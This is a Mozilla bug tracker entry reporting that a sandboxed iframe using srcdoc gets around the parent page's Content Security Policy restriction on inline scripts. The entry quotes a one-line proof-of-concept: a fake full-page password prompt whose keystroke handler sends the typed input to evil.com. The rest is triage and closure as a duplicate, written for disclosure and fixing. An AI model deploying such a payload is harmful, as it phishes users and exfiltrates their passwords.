Closed Bug 1315952 Opened 8 years ago Closed 8 years ago

iframe sandbox with srcdoc bypasses inline script restriction from parent document CSP

Categories

(Core :: DOM: Security, defect)

defect
Not set
normal

Tracking

()

RESOLVED DUPLICATE of bug 1073952

People

(Reporter: freddy, Unassigned)

Details

(Keywords: sec-moderate)

Sent to me from Mario Heiderich (CCd):

> <iframe style='background:#F5F5F5;position:absolute;top:0;left:0;height:100%;width:100%;border:0' sandbox='allow-scripts' srcdoc='<h1>Please Enter Your Password</h1><input onkeyup=fetch("https://evil.com/?pass= "+this.value)>'>


This is only half a CSP bypass. The sandbox attribute is required to "lose" the outer document's CSP and thus execute scripts. But this also means that the srcdoc iframe cannot access the top level content. Still dangerous for phishing and such.
Group: core-security → dom-core-security
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
Group: dom-core-security
You need to log in before you can comment on or make changes to this bug.